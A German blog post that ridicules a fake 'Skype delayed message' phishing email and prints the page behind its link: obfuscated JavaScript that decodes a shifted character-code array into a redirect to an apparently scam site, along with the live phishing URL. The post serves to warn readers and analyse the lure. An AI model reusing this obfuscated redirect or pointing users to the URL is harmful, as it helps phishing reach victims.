Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Hi Elias Schwerdtfeger Delayed message

Samstag, 30. November 2019, 14:25 Uhr

Hui, dieser freundliche Idiot aus dem Spamfilter kennt sogar meinen Namen und schreibt ihn gleich in den Betreff rein, statt mir zu sagen, um was es geht. Er glaubt, damit ein bisschen Aufmerksamkeit zu bekommen. Wie man an diesem Posting sieht, ist ihm das sogar gelungen.

TheSkypeTeam <giuga@tieffeinfo.it>

Aha, „das Skype-Team“ benutzt irgendwelche Mailadressen in irgendwelchen Domains. So ein Jammer aber auch, dass Microsoft sich für sein Skype keine eigene Domain leisten kann. 😀

Skype

Delayed message.

View messages

Respectfully
Skype support
© SkypeTeam.

Ja ja, sehr respektvoll! 🖕

So so, da hat sich also eine angebliche Skype-Nachricht für mich verzögert, und deshalb soll ich jetzt in eine E-Mail klicken, was immer eine ganz schlechte Idee ist. Der Link geht natürlich nicht zu Skype, sondern in das Upload-Verzeichnis eines gecrackten WordPress-Blogs, damit man schon vorher weiß, womit man es zu tun hat: Mit Irreführung, Spam und Kriminalität.

Übrigens benutze ich Skype nicht und habe folglich auch keinen Account. Wenn ich chatten will, finde ich offene Standards wie IRC und XMPP völlig hinreichend und bedarf nicht des Angebotes einer Unternehmung aus einem Überwachungsstaat, die von Rechts wegen zur Kooperation mit den Geheimdiensten dieses Überwachungsstaates gezwungen ist.

Der Link scheint auch ein bisschen giftig zu sein, denn er führt zu einer vorsätzlich kryptisch formulierten Javascript-Weiterleitung:

$ lynx -mime_header http://bmi.ltd/wp-content/themphp
HTTP/1.1 200 OK
Date: Sat, 30 Nov 2019 12:00:19 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>panting32517 Harlequin, remains hut andmoney - blessd, nervous reaping, infants posterity flutterd, read.</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
</head>
<body>
<script type="text/javascript">

function flu(fowls)
{
	roys = liberty / mold;
	beyond = name * taking;
	hot = grasped + polity;
}

function greetinge(agreetinge)
{
	return String.fromCharCode(agreetinge);
}

function unhearda(hadni)
{
	return 2;
}

function starsd()
{
	window.location.href = whipc();
}

starsd();

function whipc()
{
	awhipc = unhearda();
	bwhipc = [106,118,118,114,60,49,49,118,99,109,103,114,116,107,124,103,117,106,103,116,103,51,48,110,107,104,103,49,65,119,63,123,52,123,109,99,103,121,40,113,63,52,122,119,114,58,59,116,40,111,63,51,40,118,63,103,111,110,111,112,117];

	return tellsb(awhipc,bwhipc);
}

function tellsb(atellsb,btellsb)
{
	ctellsb = "";

	for (dtellsb = 0; dtellsb < btellsb.length; dtellsb++)
	{
		etellsb = btellsb[dtellsb];
		ftellsb = etellsb - atellsb;
		gtellsb = greetinge(ftellsb);
		ctellsb = ctellsb + gtellsb;
	}

	return ctellsb;
}

</script>
</body>
</html>
$ _

Ich untersuche jetzt nicht weiter, wo diese Reise hingeht, aber dass von Leuten, die so einen Mummenschanz nötig haben, nichts Gutes zu erwarten ist, sollte eigentlich jedem Menschen klar sein.

Deshalb klickt man ja auch nicht in eine E-Mail. Wer stattdessen einfach die Skype-Website aufgerufen hätte und sich dort ganz normal angemeldet hätte, hätte sofort bemerkt, dass es keine „verzögerten Nachrichten“ gibt. Und damit vermutlich einen Angriff auf seinen Computer abgewehrt.

Ein Kommentar für Hi Elias Schwerdtfeger Delayed message

  1. Freddy sagt:

    Skype wird von Wischfon Nutzern gern benutzt. Das liegt natürlich bereit im Schlafzimmer. Ist doch großzügig auch andere an den heißen Nächten teilnehmen zu lassen. Mit einem kleinen Hack oder „Pflugins“ wie mal wieder einem missglückten Update, Upgrade lässt sich Skype zur Wanze machen. 😜

    Sowas und gängige Fotos von hemmungslosen Partys machen sich bei der Bewerbung in seriösen Jobs sicher gut. Merke: Der zukünftige Chef sieht sich das sehr genau im Internet an. 😎

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.